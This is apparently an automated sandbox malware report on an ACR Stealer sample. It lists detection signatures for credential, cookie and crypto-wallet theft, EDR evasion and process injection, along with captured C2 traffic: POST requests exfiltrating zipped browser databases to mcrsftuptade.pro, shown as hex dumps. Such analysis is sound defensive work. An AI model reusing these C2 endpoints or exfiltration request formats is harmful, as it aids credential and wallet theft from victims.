Windows Analysis Report
Set-up.exe

General Information

Sample name: Set-up.exe
Analysis ID: 1686587
Has dependencies: false
MD5: b21f13cf1a28ffc443ca52a022c78c3d
SHA1: 7704084a3977b18d2ac687eef97bb3cb27e33ff2
SHA256: 6cd56f0b601722945ffc79d0a5468784fe9b1552fdd1931a64cd0f5608a7d697
Tags: de-pumped, exe, user-abuse_ch
Infos: yara

Detection

ACR Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected ACR Stealer
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal from password manager
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

AV Detection

Source: http://mcrsftuptade.pro/Up/g Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up/p Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up/b Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up Avira URL Cloud: Label: malware
Source: Submitted Sample Neural Call Log Analysis: 90.1%
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_02682F00 LoadLibraryA,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,CryptUnprotectData,FreeLibrary,FreeLibrary,FreeLibrary, 0_2_02682F00
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT

Networking

Source: Network traffic Suricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.5:49691 -> 188.114.96.3:80
Source: global traffic HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1 Host: mcrsftuptade.pro Connection: close
Source: global traffic HTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 291Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b7 00 00 00 00 00 Data Ascii: PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 41649Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 c3 94 76 3c 00 a0 00 00 00 a0 00 00 11 00 00 00 62 2f 63 38 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 7a 70 05 00 00 00 01 07 fb 00 00 00 00 0d 07 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 51889Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 e5 a5 64 a8 00 c8 00 00 00 c8 00 00 11 00 00 00 62 2f 63 39 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 01 00 00 00 19 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 2e 6a d0 05 00 00 00 02 07 f6 00 00 00 00 18 07 fb 07 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524940Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 25259Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 a9 82 77 8d 00 60 00 00 00 60 00 00 0e 00 00 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 0c 00 00 00 06 00 00 00 04 00 00 00 01 00 00 00 17 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 2e 7a 70 0d 0d 18 00 04 09 f1 00 0f 67 0f cf 0a ae 09 f1 09 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 21163Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 23 6d d8 2e 00 50 00 00 00 50 00 00 0e 00 00 00 62 2f 63 39 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 07 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 2e 6a d0 0d 0d 24 00 04 0a 0c 00 0f 67 0f cf 0a 0c 0c 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 623250Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Up/p HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 489Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 ff 07 87 57 37 01 00 00 37 01 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6f 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 22 2c 22 75 6e 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 70 22 3a 22 41 4c 46 4f 4e 53 2d 50 43 22 2c 22 61 22 3a 22 78 36 34 22 2c 22 63 22 3a 34 2c 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 64 6e 22 